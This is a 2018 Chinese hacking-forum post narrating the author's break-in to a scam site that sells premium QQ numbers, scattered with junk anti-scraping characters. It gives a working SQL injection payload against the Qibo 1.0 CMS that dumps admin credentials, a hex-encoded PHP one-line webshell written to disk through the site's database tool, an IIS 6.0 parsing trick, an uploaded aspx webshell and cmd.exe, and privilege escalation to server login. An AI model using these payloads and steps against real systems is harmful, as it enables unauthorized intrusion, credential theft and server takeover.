找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1280|回复: 0
打印 上一主题 下一主题

入侵卖靓号QQ骗子网站服务器纪实

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:08:47 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

' z1 K s- R3 V* F
7 I+ b- _& D$ w4 X5 j/ q

! y* ^# c& F/ M' R

t, ^, _9 b" p8 [ 一、踩点寻找漏洞
6 k7 J, P1 k7 N1 P% a8 e
闲来无事,在各个QQ靓号群求买5QQ,寻问半天无果就在百度搜索5QQ扫号找到目标www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
) [! [/ \* J! @# {7 ]
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
5 I3 F0 F/ m/ `. h, v
先注册一个用户,记住注册时候的邮箱以uid号,
% l2 [+ \" v' H: e2 G
3-1.png
) h x1 r& A- ?
3-2.png
4 y( O6 f7 X0 N' g. |/ {
然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
}" ?* D. l( w
: |% A# n3 _* f0 Ytruename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
7 r4 ~1 S v+ y# }
这里的emailuid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
& Z( x# @$ y5 c4 q( N2 n# j4 c
3-3.png
# t- _4 u' n$ U/ L3 l" [4 v
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
# x+ Y# q7 M& i, }& M5 j
3-4.png
9 k0 U ?4 n7 \2 t
+ H2 i0 n1 j$ ?6 X
解密进后台如图:
2 v M; T3 I% R& O4 n* r
3-5.png
1 }5 f/ s+ i# z$ {" K# h
, q& X: E! B/ l
- r0 {) u% A; ]+ Z! R
二、后台getwebshell        
0 ^" t7 O3 S! v; ]( v4 b$ R
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
2 i, W8 `1 o" W8 G$ @# }
0 d4 ~2 g9 q2 D1 N9 V& v, K
3-6.png
. L0 p- w, p& A; Y! o
) [0 m, } M% T6 P; @ I$ w
然后点确定,添加提示
& ?) C- C* r$ H. A
# v% k) x' v {4 D( i Z
3-7.png
0 Q+ ^4 B6 X; w/ G- B f* o& q
0 Z% g. Z$ X3 F# z' b2 |
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
" S- [ m+ g$ e0 w; R4 }( z
- q& m) v' n* |' f
3-8.png
; e# E1 i' p: L5 |% Y
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
( J" f" ~* I4 B" q9 V# f/ C
如图:
: |& B: N# I( n, d! B8 |7 ^
3-9.png
6 H/ P) _! M' B, u- q$ K# o. r" g
3-10.png
1 @/ g1 r: q% z, {- N
2 A( S& s; ~3 N' C6 S7 Q& K, L
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
! O- m3 n* v; O" R
7 f. v4 G( {( p: Y2 {0 z
3-11.png
. ?* ^' P( l& w: a( @( J5 X; I
$ w k6 R p8 U% k+ |4 M
三、提权进服务器
6 v1 p! h+ C, _# j
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
+ {0 g6 j8 g5 i0 T6 I' i' i
3-12.png
* w5 I1 v6 }( W# K, o
/ F, n0 r1 S6 S4 {
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
5 {7 Q8 l- d' f. `2 ]
3-13.png
% n: u5 ?6 K( w8 F! X. r
/ X0 Q& U) p( b; k. S* N; b
然后登陆服务器如图:
2 ~. k: v: z8 A' p* ^8 j1 c. d' h
& k0 D2 z, @; U- _0 ?8 P/ M
3-14.png 2 D; c; R9 w: D2 _4 M Q; r$ f8 |5 u

; H! D+ p5 H( y8 B5 `

5 ?+ w5 j+ _- V0 Y& T2 @# I, F
- F+ q* K! V# V7 F @6 Q8 L
难怪普通刀连接不上,原来是有狗。
) a0 @2 ]/ I: ` n4 W: O
& A6 C/ Y, T7 B5 E8 I
2 r4 J9 Y/ @5 i2 |3 A6 b2 d, \
/ b# H4 x: E5 {& s8 U5 z

/ W0 U0 j/ W3 f9 A8 s: ~ ~2 n

p4 {4 Q5 v. o( a6 B9 x( U
9 I4 R; n/ z j8 L4 S

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表